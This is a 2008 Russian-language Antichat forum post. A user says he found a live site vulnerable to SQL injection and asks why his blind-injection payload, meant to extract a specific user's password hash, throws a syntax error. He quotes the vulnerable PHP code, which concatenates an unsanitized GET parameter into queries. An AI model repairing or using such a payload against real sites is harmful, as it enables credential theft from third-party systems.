ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
   
 
 
Опции темы Поиск в этой теме Опции просмотра

не могу понять что за ошибка в sql syntax
  #1  
Старый 23.12.2008, 21:25
downloader
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978

Репутация: 1
Talking не могу понять что за ошибка в sql syntax

здрасте я нашёл один сайт с sql inject`ом, я посмотрел в компе у меня есть тот же скрипт, но мне надо через тот sql inject надо сделати запрос, вот я сделал:

Код:
file.php?requestid=-1+or+id=if(ascii(substring((select+passhash+from+users+where+id=103949),=65,1))1,1,(select+1+union+select+2))+--+
но мне даёт error:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from users where id=103949),=65,1))1,1,( 1 2)) --' at line 1

понятно что в syntax но не магу найти где имена, скажите пожалуйста в чём я ошибся... вот скрипт:

Код:
$requestid = $_GET["requestid"];
$res = mysql_query("SELECT userid, filledby FROM requests WHERE id =$requestid") or err();
 $arr = mysql_fetch_assoc($res);
if (($USER[id] == $arr[userid]) || (get_class() >= MODERATOR) || ($USER[id] == $arr[filledby]))
{
 @mysql_query("UPDATE requests SET filled='', filledby=0 WHERE id =$requestid") or err();
 print("Request $requestid successfully reset.");
}
else
 print("Sorry, cannot reset a request when you are not the owner");
скажите пожалуйста в чём я ошибся а то я ламаю голову весь день и не могу найти

Последний раз редактировалось downloader; 23.12.2008 в 21:39..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Gta 4 InfernoNet Болталка 593 27.04.2010 17:09
Комп пищит и дымиться MrTrick Аппаратное обеспечение 54 15.08.2009 01:09
Ошибки Windows 2 SVipeR Windows 9 02.03.2009 19:28
Delphi: Ошибка при записи в реестр Ta2i4 С/С++, C#, Delphi, .NET, Asm 2 23.12.2008 05:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ